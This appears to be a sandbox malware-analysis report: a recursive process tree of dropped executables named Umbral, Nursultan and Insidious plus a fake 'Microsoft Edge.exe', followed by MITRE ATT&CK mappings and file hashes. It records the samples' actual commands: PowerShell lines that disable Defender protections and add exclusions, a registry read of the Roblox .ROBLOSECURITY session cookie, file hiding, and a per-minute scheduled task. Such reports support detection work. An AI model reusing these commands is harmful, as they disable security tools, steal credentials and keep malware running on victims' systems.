        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        57⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        57⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        56⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        57⤵
        
        PID:3552
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        58⤵
        
        PID:3288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        59⤵
        
        PID:3428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        60⤵
        
        PID:3540
        
        C:\Windows\system32\cmd.exe
        
        cmd
        60⤵
        
        PID:3840
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        59⤵
        
        PID:3368
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        59⤵
        Delays execution with timeout.exe
        
        PID:2372
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        59⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        58⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        58⤵
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        57⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        58⤵
        
        PID:2556
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        59⤵
        
        PID:3712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        60⤵
        
        PID:1388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        61⤵
        
        PID:3816
        
        C:\Windows\system32\cmd.exe
        
        cmd
        61⤵
        
        PID:2748
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        60⤵
        
        PID:3376
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        60⤵
        Delays execution with timeout.exe
        
        PID:3432
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        60⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        59⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        59⤵
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        59⤵
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        58⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        59⤵
        
        PID:3240
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        60⤵
        
        PID:3704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        61⤵
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        62⤵
        
        PID:3608
        
        C:\Windows\system32\cmd.exe
        
        cmd
        62⤵
        
        PID:3356
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        61⤵
        
        PID:3620
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        61⤵
        
        PID:3596
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        61⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        60⤵
        Checks processor information in registry
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        60⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        60⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        59⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        60⤵
        
        PID:3212
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        61⤵
        
        PID:4020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        62⤵
        
        PID:3100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        63⤵
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        cmd
        63⤵
        
        PID:3996
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        62⤵
        
        PID:3424
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        62⤵
        Delays execution with timeout.exe
        
        PID:3992
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        62⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        61⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        61⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        60⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        61⤵
        
        PID:3476
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        62⤵
        
        PID:3756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        63⤵
        
        PID:2724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        64⤵
        
        PID:4072
        
        C:\Windows\system32\cmd.exe
        
        cmd
        64⤵
        
        PID:3408
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        63⤵
        
        PID:1792
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        63⤵
        Delays execution with timeout.exe
        
        PID:1540
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        63⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        62⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        62⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        62⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        61⤵
        
        PID:3888
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        62⤵
        
        PID:1500
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        63⤵
        
        PID:1060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        64⤵
        
        PID:3952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        65⤵
        
        PID:3028
        
        C:\Windows\system32\cmd.exe
        
        cmd
        65⤵
        
        PID:1652
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        64⤵
        
        PID:3888
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        64⤵
        Delays execution with timeout.exe
        
        PID:3536
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        64⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        63⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        63⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        63⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        62⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        63⤵
        
        PID:3928
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        64⤵
        
        PID:3088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        65⤵
        
        PID:3932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        66⤵
        
        PID:2556
        
        C:\Windows\system32\cmd.exe
        
        cmd
        66⤵
        
        PID:3300
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        65⤵
        
        PID:3224
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        65⤵
        Delays execution with timeout.exe
        
        PID:3504
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        65⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        64⤵
        Checks processor information in registry
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        64⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        64⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        63⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        64⤵
        
        PID:948
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        65⤵
        
        PID:3140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        66⤵
        
        PID:3272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        67⤵
        
        PID:3988
        
        C:\Windows\system32\cmd.exe
        
        cmd
        67⤵
        
        PID:3860
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        66⤵
        
        PID:3948
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        66⤵
        Delays execution with timeout.exe
        
        PID:3596
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        66⤵
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        65⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        65⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        65⤵
        Drops file in Drivers directory
        
        PID:4024
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        66⤵
        
        PID:3076
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        66⤵
        Views/modifies file attributes
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        64⤵
        
        PID:3360
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        65⤵
        
        PID:3524
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        66⤵
        
        PID:3188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        67⤵
        
        PID:3184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        68⤵
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        cmd
        68⤵
        
        PID:3540
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        67⤵
        
        PID:3848
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        67⤵
        Delays execution with timeout.exe
        
        PID:2704
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        67⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        66⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        66⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        66⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        65⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        66⤵
        
        PID:3336
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        67⤵
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        68⤵
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        69⤵
        
        PID:3324
        
        C:\Windows\system32\cmd.exe
        
        cmd
        69⤵
        
        PID:3920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        68⤵
        
        PID:3940
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        68⤵
        Delays execution with timeout.exe
        
        PID:3128
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        68⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        67⤵
        Checks processor information in registry
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        67⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        67⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        66⤵
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        67⤵
        
        PID:408
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        68⤵
        
        PID:3204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        69⤵
        
        PID:3460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        70⤵
        
        PID:3724
        
        C:\Windows\system32\cmd.exe
        
        cmd
        70⤵
        
        PID:3868
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        69⤵
        
        PID:4072
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        69⤵
        Delays execution with timeout.exe
        
        PID:3980
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        69⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        68⤵
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        68⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        68⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        67⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        68⤵
        
        PID:3260
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        69⤵
        
        PID:3252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        70⤵
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        71⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        cmd
        71⤵
        
        PID:3856
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        70⤵
        
        PID:3236
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        70⤵
        Delays execution with timeout.exe
        
        PID:928
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        70⤵
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        69⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        69⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        69⤵
        
        PID:3552
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        68⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        69⤵
        
        PID:3912
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        70⤵
        
        PID:3340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        71⤵
        
        PID:3872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        72⤵
        
        PID:1500
        
        C:\Windows\system32\cmd.exe
        
        cmd
        72⤵
        
        PID:3468
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        71⤵
        
        PID:1372
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        71⤵
        Delays execution with timeout.exe
        
        PID:3684
        
        C:\Windows\system32\mode.com
        
        mode con: cols=103 lines=21
        71⤵
        
        PID:3360
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        70⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        70⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        70⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        69⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        70⤵
        
        PID:3860
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nursultan.bat" "
        71⤵
        
        PID:2964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
        72⤵
        
        PID:3328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
        73⤵
        
        PID:1788
        
        C:\Windows\system32\cmd.exe
        
        cmd
        73⤵
        
        PID:3564
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        72⤵
        
        PID:324
        
        C:\Windows\system32\timeout.exe
        
        timeout 4 /nobreak
        72⤵
        Delays execution with timeout.exe
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\Insidious.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
        71⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
        71⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        71⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        70⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe"
        71⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        71⤵
        
        PID:2372
- C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe
  "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:1268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft Edge'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\Admin\AppData\Roaming\Microsoft Edge"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2804

C:\Windows\system32\taskeng.exe
taskeng.exe {816AD312-54D7-46DC-82B1-A86D60B0105A} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
1⤵
PID:1920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\44\Process.txt

Filesize
328B

MD5
e6abdf3e0ff42f48daf2cfd28f33855d

SHA1
df74253bca5fc85e4530a9ca49dabbfb94a76dcb

SHA256
6245fdea945ec362b96fbb049c961c5f03b57fadf98c0bff79197a9a3d9d0427

SHA512
f540a83bc1aa375b4fd055d33d0043a90181c5d4bc05d6319344d45ed10b42d8ca078ecbafc40b8164cdbb36b782b96136860a24125df99a30fc8cb5a5a55e8e

Download Submit
C:\ProgramData\44\Process.txt

Filesize
1KB

MD5
71bd3a9697e2079f9c17025b1ab38251

SHA1
ab9b4552e15aed9eaf3a65b73dcfad1b737524b0

SHA256
